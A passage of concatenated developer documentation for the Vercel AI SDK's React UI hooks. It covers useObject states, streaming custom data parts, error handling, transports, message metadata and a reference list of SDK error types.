export default function ClassifyPage() {
  const { object, submit, isLoading } = useObject({
    api: '/api/classify',
    schema: z.object({ enum: z.enum(['true', 'false']) }),
  });

  return (
    <>
      <button onClick={() => submit('The earth is flat')} disabled={isLoading}>
        Classify statement
      </button>

      {object && <div>Classification: {object.enum}</div>}
    </>
  );
}

Server

On the server, use streamObject with output: 'enum' to stream the classification result:

import { streamObject } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamObject({
    model: __MODEL__,
    output: 'enum',
    enum: ['true', 'false'],
    prompt: `Classify this statement as true or false: ${context}`,
  });

  return result.toTextStreamResponse();
}

Customized UI

useObject also provides ways to show loading and error states:

Loading State

The isLoading state returned by the useObject hook can be used for several purposes:

To show a loading spinner while the object is generated.
To disable the submit button.

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && <Spinner />}

      <button
        onClick={() => submit('Messages during finals week.')}
        disabled={isLoading}
      >
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Stop Handler

The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, stop, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && (
        <button type="button" onClick={() => stop()}>
          Stop
        </button>
      )}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or to disable the submit button:

'use client';

import { useObject } from '@ai-sdk/react';

export default function Page() {
  const { error, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {error && <div>An error occurred.</div>}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Event Callbacks

useObject provides optional event callbacks that you can use to handle life-cycle events.

onFinish: Called when the object generation is completed.
onError: Called when an error occurs during the fetch request.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
    onFinish({ object, error }) {
      // typed object, undefined if schema validation fails:
      console.log('Object generation completed:', object);

      // error, undefined if schema validation succeeds:
      console.log('Schema validation error:', error);
    },
    onError(error) {
      // error during fetch request:
      console.error('An error occurred:', error);
    },
  });

  return (
    <div>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </div>
  );
}

Configure Request Options

You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.

const { submit, object } = useObject({
  api: '/api/use-object',
  headers: {
    'X-Custom-Header': 'CustomValue',
  },
  credentials: 'include',
  schema: yourSchema,
});

title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.

Streaming Custom Data

The AI SDK provides several helpers that allows you to stream additional data to the client and attach it to the UIMessage parts array:

createUIMessageStream: creates a data stream
createUIMessageStreamResponse: creates a response object that streams data
pipeUIMessageStreamToResponse: pipes a data stream to a server response object

The data is streamed as part of the response stream using Server-Sent Events.

Setting Up Type-Safe Data Streaming

First, define your custom message type with data part schemas for type safety:

import { UIMessage } from 'ai';

// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
  never, // metadata type
  {
    weather: {
      city: string;
      weather?: string;
      status: 'loading' | 'success';
    };
    notification: {
      message: string;
      level: 'info' | 'warning' | 'error';
    };
  } // data parts type
>;

Streaming Data from the Server

In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:

import { openai } from '@ai-sdk/openai';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
  convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream<MyUIMessage>({
    execute: ({ writer }) => {
      // 1. Send initial status (transient - won't be added to message history)
      writer.write({
        type: 'data-notification',
        data: { message: 'Processing your request...', level: 'info' },
        transient: true, // This part won't be added to message history
      });

      // 2. Send sources (useful for RAG use cases)
      writer.write({
        type: 'source',
        value: {
          type: 'source',
          sourceType: 'url',
          id: 'source-1',
          url: 'https://weather.com',
          title: 'Weather Data Source',
        },
      });

      // 3. Send data parts with loading state
      writer.write({
        type: 'data-weather',
        id: 'weather-1',
        data: { city: 'San Francisco', status: 'loading' },
      });

      const result = streamText({
        model: __MODEL__,
        messages: convertToModelMessages(messages),
        onFinish() {
          // 4. Update the same data part (reconciliation)
          writer.write({
            type: 'data-weather',
            id: 'weather-1', // Same ID = update existing part
            data: {
              city: 'San Francisco',
              weather: 'sunny',
              status: 'success',
            },
          });

          // 5. Send completion notification (transient)
          writer.write({
            type: 'data-notification',
            data: { message: 'Request completed', level: 'info' },
            transient: true, // Won't be added to message history
          });
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Types of Streamable Data

Data Parts (Persistent)

Regular data parts are added to the message history and appear in message.parts:

writer.write({
  type: 'data-weather',
  id: 'weather-1', // Optional: enables reconciliation
  data: { city: 'San Francisco', status: 'loading' },
});

Sources

Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:

writer.write({
  type: 'source',
  value: {
    type: 'source',
    sourceType: 'url',
    id: 'source-1',
    url: 'https://example.com',
    title: 'Example Source',
  },
});

Transient Data Parts (Ephemeral)

Transient parts are sent to the client but not added to the message history. They are only accessible via the onData useChat handler:

// server
writer.write({
  type: 'data-notification',
  data: { message: 'Processing...', level: 'info' },
  transient: true, // Won't be added to message history
});

// client
const [notification, setNotification] = useState();

const { messages } = useChat({
  onData: ({ data, type }) => {
    if (type === 'data-notification') {
      setNotification({ message: data.message, level: data.level });
    }
  },
});

Data Part Reconciliation

When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:

Collaborative artifacts - Update code, documents, or designs in real-time
Progressive data loading - Show loading states that transform into final results
Live status updates - Update progress bars, counters, or status indicators
Interactive components - Build UI elements that evolve based on user interaction

The reconciliation happens automatically - simply use the same id when writing to the stream.

Processing Data on the Client

Using the onData Callback

The onData callback is essential for handling streaming data, especially transient parts:

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from '@/ai/types';

const { messages } = useChat<MyUIMessage>({
  api: '/api/chat',
  onData: dataPart => {
    // Handle all data parts as they arrive (including transient parts)
    console.log('Received data part:', dataPart);

    // Handle different data part types
    if (dataPart.type === 'data-weather') {
      console.log('Weather update:', dataPart.data);
    }

    // Handle transient notifications (ONLY available here, not in message.parts)
    if (dataPart.type === 'data-notification') {
      showToast(dataPart.data.message, dataPart.data.level);
    }
  },
});

Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.

Rendering Persistent Data Parts

You can filter and render data parts from the message parts array:

const result = (
  <>
    {messages?.map(message => (
      <div key={message.id}>
        {/* Render weather data parts */}
        {message.parts
          .filter(part => part.type === 'data-weather')
          .map((part, index) => (
            <div key={index} className="weather-widget">
              {part.data.status === 'loading' ? (
                <>Getting weather for {part.data.city}...</>
              ) : (
                <>
                  Weather in {part.data.city}: {part.data.weather}
                </>
              )}
            </div>
          ))}

        {/* Render text content */}
        {message.parts
          .filter(part => part.type === 'text')
          .map((part, index) => (
            <div key={index}>{part.text}</div>
          ))}

        {/* Render sources */}
        {message.parts
          .filter(part => part.type === 'source')
          .map((part, index) => (
            <div key={index} className="source">
              Source: <a href={part.url}>{part.title}</a>
            </div>
          ))}
      </div>
    ))}
  </>
);

Complete Example

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat<MyUIMessage>({
    api: '/api/chat',
    onData: dataPart => {
      // Handle transient notifications
      if (dataPart.type === 'data-notification') {
        console.log('Notification:', dataPart.data.message);
      }
    },
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}

          {/* Render weather data */}
          {message.parts
            .filter(part => part.type === 'data-weather')
            .map((part, index) => (
              <span key={index} className="weather-update">
                {part.data.status === 'loading' ? (
                  <>Getting weather for {part.data.city}...</>
                ) : (
                  <>
                    Weather in {part.data.city}: {part.data.weather}
                  </>
                )}
              </span>
            ))}

          {/* Render text content */}
          {message.parts
            .filter(part => part.type === 'text')
            .map((part, index) => (
              <div key={index}>{part.text}</div>
            ))}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Ask about the weather..."
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Use Cases

RAG Applications - Stream sources and retrieved documents
Real-time Status - Show loading states and progress updates
Collaborative Tools - Stream live updates to shared artifacts
Analytics - Send usage data without cluttering message history
Notifications - Display temporary alerts and status messages

Message Metadata vs Data Parts

Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:

Message Metadata

Message metadata is best for message-level information that describes the message as a whole:

Attached at the message level via message.metadata
Sent using the messageMetadata callback in toUIMessageStreamResponse
Ideal for: timestamps, model info, token usage, user context
Type-safe with custom metadata types

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'finish') {
      return {
        model: part.response.modelId,
        totalTokens: part.totalUsage.totalTokens,
        createdAt: Date.now(),
      };
    }
  },
});

Data Parts

Data parts are best for streaming dynamic arbitrary data:

Added to the message parts array via message.parts
Streamed using createUIMessageStream and writer.write()
Can be reconciled/updated using the same ID
Support transient parts that don't persist
Ideal for: dynamic content, loading states, interactive components

// Server: Stream data as part of message content
writer.write({
  type: 'data-weather',
  id: 'weather-1',
  data: { city: 'San Francisco', status: 'loading' },
});

For more details on message metadata, see the Message Metadata documentation.

title: Error Handling description: Learn how to handle errors in the AI SDK UI

Error Handling and warnings

Warnings

The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.

When Warnings Appear

Warnings are shown in the browser console when:

Unsupported settings: You use a setting that the AI model doesn't support
Unsupported tools: You use a tool that the AI model can't use
Other issues: The AI model reports other problems

Warning Messages

All warnings start with "AI SDK Warning:" so you can easily find them. For example:

AI SDK Warning: The "temperature" setting is not supported by this model
AI SDK Warning: The tool "calculator" is not supported by this model

Turning Off Warnings

By default, warnings are shown in the console. You can control this behavior:

Turn Off All Warnings

Set a global variable to turn off warnings completely:

globalThis.AI_SDK_LOG_WARNINGS = false;

Custom Warning Handler

You can also provide your own function to handle warnings:

globalThis.AI_SDK_LOG_WARNINGS = warnings => {
  // Handle warnings your own way
  warnings.forEach(warning => {
    // Your custom logic here
    console.log('Custom warning:', warning);
  });
};

Error Handling

Error Helper Object

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage, error, regenerate } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => regenerate()}>
            Retry
          </button>
        </>
      )}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Alternative: replace last message

Alternatively you can write a custom submit handler that replaces the last message when an error is present.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { sendMessage, error, messages, setMessages } = useChat();

  function customSubmit(event: React.FormEvent<HTMLFormElement>) {
    event.preventDefault();

    if (error != null) {
      setMessages(messages.slice(0, -1)); // remove last message
    }

    sendMessage({ text: input });
    setInput('');
  }

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && <div>An error occurred.</div>}

      <form onSubmit={customSubmit}>
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

Error Handling Callback

Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks. The callback function receives an error object as an argument.

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const {
    /* ... */
  } = useChat({
    // handle error:
    onError: error => {
      console.error(error);
    },
  });
}

Injecting Errors for Testing

You might want to create errors for testing. You can easily do so by throwing an error in your route handler:

export async function POST(req: Request) {
  throw new Error('This is a test error');
}

title: Transport description: Learn how to use custom transports with useChat.

Transport

The useChat transport system provides fine-grained control over how messages are sent to your API endpoints and how responses are processed. This is particularly useful for alternative communication protocols like WebSockets, custom authentication patterns, or specialized backend integrations.

Default Transport

By default, useChat uses HTTP POST requests to send messages to /api/chat:

import { useChat } from '@ai-sdk/react';

// Uses default HTTP transport
const { messages, sendMessage } = useChat();

This is equivalent to:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
  }),
});

Custom Transport Configuration

Configure the default transport with custom options:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'Bearer your-token',
      'X-API-Version': '2024-01',
    },
    credentials: 'include',
  }),
});

Dynamic Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request Transformation

Transform requests before sending to your API:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
      return {
        headers: {
          'X-Session-ID': id,
        },
        body: {
          messages: messages.slice(-10), // Only send last 10 messages
          trigger,
          messageId,
        },
      };
    },
  }),
});

Building Custom Transports

To understand how to build your own transport, refer to the source code of the default implementation:

DefaultChatTransport - The complete default HTTP transport implementation
HttpChatTransport - Base HTTP transport with request handling
ChatTransport Interface - The transport interface you need to implement

These implementations show you exactly how to:

Handle the sendMessages method
Process UI message streams
Transform requests and responses
Handle errors and connection management

The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.

title: Reading UIMessage Streams description: Learn how to read UIMessage streams.

Reading UI Message Streams

UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).

The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.

Basic Usage

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function main() {
  const result = streamText({
    model: __MODEL__,
    prompt: 'Write a short story about a robot.',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    console.log('Current message state:', uiMessage);
  }
}

Tool Calls Integration

Handle streaming responses that include tool calls:

import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleToolCalls() {
  const result = streamText({
    model: __MODEL__,
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: ({ location }) => ({
          location,
          temperature: 72 + Math.floor(Math.random() * 21) - 10,
        }),
      }),
    },
    prompt: 'What is the weather in Tokyo?',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    // Handle different part types
    uiMessage.parts.forEach(part => {
      switch (part.type) {
        case 'text':
          console.log('Text:', part.text);
          break;
        case 'tool-call':
          console.log('Tool called:', part.toolName, 'with args:', part.args);
          break;
        case 'tool-result':
          console.log('Tool result:', part.result);
          break;
      }
    });
  }
}

Resuming Conversations

Resume streaming from a previous message state:

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function resumeConversation(lastMessage: UIMessage) {
  const result = streamText({
    model: __MODEL__,
    messages: [
      { role: 'user', content: 'Continue our previous conversation.' },
    ],
  });

  // Resume from the last message
  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
    message: lastMessage, // Resume from this message
  })) {
    console.log('Resumed message:', uiMessage);
  }
}

title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI

Message Metadata

Message metadata allows you to attach custom information to messages at the message level. This is useful for tracking timestamps, model information, token usage, user context, and other message-level data.

Overview

Message metadata differs from data parts in that it's attached at the message level rather than being part of the message content. While data parts are ideal for dynamic content that forms part of the message, metadata is perfect for information about the message itself.

Getting Started

Here's a simple example of using message metadata to track timestamps and model information:

Defining Metadata Types

First, define your metadata type for type safety:

import { UIMessage } from 'ai';
import { z } from 'zod';

// Define your metadata schema
export const messageMetadataSchema = z.object({
  createdAt: z.number().optional(),
  model: z.string().optional(),
  totalTokens: z.number().optional(),
});

export type MessageMetadata = z.infer<typeof messageMetadataSchema>;

// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;

Sending Metadata from the Server

Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:

import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages, // pass this in for type-safe return objects
    messageMetadata: ({ part }) => {
      // Send metadata when streaming starts
      if (part.type === 'start') {
        return {
          createdAt: Date.now(),
          model: 'your-model-id',
        };
      }

      // Send additional metadata when streaming completes
      if (part.type === 'finish') {
        return {
          totalTokens: part.totalUsage.totalTokens,
        };
      }
    },
  });
}

Accessing Metadata on the Client

Access metadata through the message.metadata property:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';

export default function Chat() {
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>
            {message.role === 'user' ? 'User: ' : 'AI: '}
            {message.metadata?.createdAt && (
              <span className="text-sm text-gray-500">
                {new Date(message.metadata.createdAt).toLocaleTimeString()}
              </span>
            )}
          </div>

          {/* Render message content */}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <div key={index}>{part.text}</div> : null,
          )}

          {/* Display additional metadata */}
          {message.metadata?.totalTokens && (
            <div className="text-xs text-gray-400">
              {message.metadata.totalTokens} tokens
            </div>
          )}
        </div>
      ))}
    </div>
  );
}

Common Use Cases

Message metadata is ideal for:

Timestamps: When messages were created or completed
Model Information: Which AI model was used
Token Usage: Track costs and usage limits
User Context: User IDs, session information
Performance Metrics: Generation time, time to first token
Quality Indicators: Finish reason, confidence scores

title: AI_APICallError description: Learn how to fix AI_APICallError

AI_APICallError

This error occurs when an API call fails.

Properties

url: The URL of the API request that failed
requestBodyValues: The request body values sent to the API
statusCode: The HTTP status code returned by the API
responseHeaders: The response headers returned by the API
responseBody: The response body returned by the API
isRetryable: Whether the request can be retried based on the status code
data: Any additional data associated with the error

Checking for this Error

You can check if an error is an instance of AI_APICallError using:

import { APICallError } from 'ai';

if (APICallError.isInstance(error)) {
  // Handle the error
}

title: AI_DownloadError description: Learn how to fix AI_DownloadError

AI_DownloadError

This error occurs when a download fails.

Properties

url: The URL that failed to download
statusCode: The HTTP status code returned by the server
statusText: The HTTP status text returned by the server
message: The error message containing details about the download failure

Checking for this Error

You can check if an error is an instance of AI_DownloadError using:

import { DownloadError } from 'ai';

if (DownloadError.isInstance(error)) {
  // Handle the error
}

title: AI_EmptyResponseBodyError description: Learn how to fix AI_EmptyResponseBodyError

AI_EmptyResponseBodyError

This error occurs when the server returns an empty response body.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_EmptyResponseBodyError using:

import { EmptyResponseBodyError } from 'ai';

if (EmptyResponseBodyError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidArgumentError description: Learn how to fix AI_InvalidArgumentError

AI_InvalidArgumentError

This error occurs when an invalid argument was provided.

Properties

parameter: The name of the parameter that is invalid
value: The invalid value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidArgumentError using:

import { InvalidArgumentError } from 'ai';

if (InvalidArgumentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContentError description: How to fix AI_InvalidDataContentError

AI_InvalidDataContentError

This error occurs when the data content provided in a multi-modal message part is invalid. Check out the prompt examples for multi-modal messages .

Properties

content: The invalid content value
message: The error message describing the expected and received content types

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContentError using:

import { InvalidDataContentError } from 'ai';

if (InvalidDataContentError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidDataContent description: Learn how to fix AI_InvalidDataContent

AI_InvalidDataContent

This error occurs when invalid data content is provided.

Properties

content: The invalid content value
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidDataContent using:

import { InvalidDataContent } from 'ai';

if (InvalidDataContent.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidMessageRoleError description: Learn how to fix AI_InvalidMessageRoleError

AI_InvalidMessageRoleError

This error occurs when an invalid message role is provided.

Properties

role: The invalid role value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidMessageRoleError using:

import { InvalidMessageRoleError } from 'ai';

if (InvalidMessageRoleError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidPromptError description: Learn how to fix AI_InvalidPromptError

AI_InvalidPromptError

This error occurs when the prompt provided is invalid.

Properties

prompt: The invalid prompt value
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidPromptError using:

import { InvalidPromptError } from 'ai';

if (InvalidPromptError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidResponseDataError description: Learn how to fix AI_InvalidResponseDataError

AI_InvalidResponseDataError

This error occurs when the server returns a response with invalid data content.

Properties

data: The invalid response data value
message: The error message

Checking for this Error

You can check if an error is an instance of AI_InvalidResponseDataError using:

import { InvalidResponseDataError } from 'ai';

if (InvalidResponseDataError.isInstance(error)) {
  // Handle the error
}

title: AI_InvalidToolInputError description: Learn how to fix AI_InvalidToolInputError

AI_InvalidToolInputError

This error occurs when invalid tool input was provided.

Properties

toolName: The name of the tool with invalid inputs
toolInput: The invalid tool inputs
message: The error message
cause: The cause of the error

Checking for this Error

You can check if an error is an instance of AI_InvalidToolInputError using:

import { InvalidToolInputError } from 'ai';

if (InvalidToolInputError.isInstance(error)) {
  // Handle the error
}

title: AI_JSONParseError description: Learn how to fix AI_JSONParseError

AI_JSONParseError

This error occurs when JSON fails to parse.

Properties

text: The text value that could not be parsed
message: The error message including parse error details

Checking for this Error

You can check if an error is an instance of AI_JSONParseError using:

import { JSONParseError } from 'ai';

if (JSONParseError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadAPIKeyError description: Learn how to fix AI_LoadAPIKeyError

AI_LoadAPIKeyError

This error occurs when API key is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadAPIKeyError using:

import { LoadAPIKeyError } from 'ai';

if (LoadAPIKeyError.isInstance(error)) {
  // Handle the error
}

title: AI_LoadSettingError description: Learn how to fix AI_LoadSettingError

AI_LoadSettingError

This error occurs when a setting is not loaded successfully.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_LoadSettingError using:

import { LoadSettingError } from 'ai';

if (LoadSettingError.isInstance(error)) {
  // Handle the error
}

title: AI_MessageConversionError description: Learn how to fix AI_MessageConversionError

AI_MessageConversionError

This error occurs when message conversion fails.

Properties

originalMessage: The original message that failed conversion
message: The error message

Checking for this Error

You can check if an error is an instance of AI_MessageConversionError using:

import { MessageConversionError } from 'ai';

if (MessageConversionError.isInstance(error)) {
  // Handle the error
}

title: AI_NoContentGeneratedError description: Learn how to fix AI_NoContentGeneratedError

AI_NoContentGeneratedError

This error occurs when the AI provider fails to generate content.

Properties

message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoContentGeneratedError using:

import { NoContentGeneratedError } from 'ai';

if (NoContentGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoImageGeneratedError description: Learn how to fix AI_NoImageGeneratedError

AI_NoImageGeneratedError

This error occurs when the AI provider fails to generate an image. It can arise due to the following reasons:

The model failed to generate a response.
The model generated an invalid response.

Properties

message: The error message.
responses: Metadata about the image model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling.

Checking for this Error

You can check if an error is an instance of AI_NoImageGeneratedError using:

import { generateImage, NoImageGeneratedError } from 'ai';

try {
  await generateImage({ model, prompt });
} catch (error) {
  if (NoImageGeneratedError.isInstance(error)) {
    console.log('NoImageGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

title: AI_NoObjectGeneratedError description: Learn how to fix AI_NoObjectGeneratedError

AI_NoObjectGeneratedError

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

Properties

message: The error message.
text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
finishReason: Request finish reason. For example 'length' if model generated maximum number of tokens, this could result in a JSON parsing error.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

Checking for this Error

You can check if an error is an instance of AI_NoObjectGeneratedError using:

import { generateObject, NoObjectGeneratedError } from 'ai';

try {
  await generateObject({ model, schema, prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
    console.log('Finish Reason:', error.finishReason);
  }
}

title: AI_NoOutputSpecifiedError description: Learn how to fix AI_NoOutputSpecifiedError

AI_NoOutputSpecifiedError

This error occurs when no output format was specified for the AI response, and output-related methods are called.

Properties

message: The error message (defaults to 'No output specified.')

Checking for this Error

You can check if an error is an instance of AI_NoOutputSpecifiedError using:

import { NoOutputSpecifiedError } from 'ai';

if (NoOutputSpecifiedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSpeechGeneratedError description: Learn how to fix AI_NoSpeechGeneratedError

AI_NoSpeechGeneratedError

This error occurs when no audio could be generated from the input.

Properties

responses: Array of responses
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSpeechGeneratedError using:

import { NoSpeechGeneratedError } from 'ai';

if (NoSpeechGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchModelError description: Learn how to fix AI_NoSuchModelError

AI_NoSuchModelError

This error occurs when a model ID is not found.

Properties

modelId: The ID of the model that was not found
modelType: The type of model
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchModelError using:

import { NoSuchModelError } from 'ai';

if (NoSuchModelError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchProviderError description: Learn how to fix AI_NoSuchProviderError

AI_NoSuchProviderError

This error occurs when a provider ID is not found.

Properties

providerId: The ID of the provider that was not found
availableProviders: Array of available provider IDs
modelId: The ID of the model
modelType: The type of model
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchProviderError using:

import { NoSuchProviderError } from 'ai';

if (NoSuchProviderError.isInstance(error)) {
  // Handle the error
}

title: AI_NoSuchToolError description: Learn how to fix AI_NoSuchToolError

AI_NoSuchToolError

This error occurs when a model tries to call an unavailable tool.

Properties

toolName: The name of the tool that was not found
availableTools: Array of available tool names
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoSuchToolError using:

import { NoSuchToolError } from 'ai';

if (NoSuchToolError.isInstance(error)) {
  // Handle the error
}

title: AI_NoTranscriptGeneratedError description: Learn how to fix AI_NoTranscriptGeneratedError

AI_NoTranscriptGeneratedError

This error occurs when no transcript could be generated from the input.

Properties

responses: Array of responses
message: The error message

Checking for this Error

You can check if an error is an instance of AI_NoTranscriptGeneratedError using:

import { NoTranscriptGeneratedError } from 'ai';

if (NoTranscriptGeneratedError.isInstance(error)) {
  // Handle the error
}

title: AI_RetryError description: Learn how to fix AI_RetryError

AI_RetryError

This error occurs when a retry operation fails.

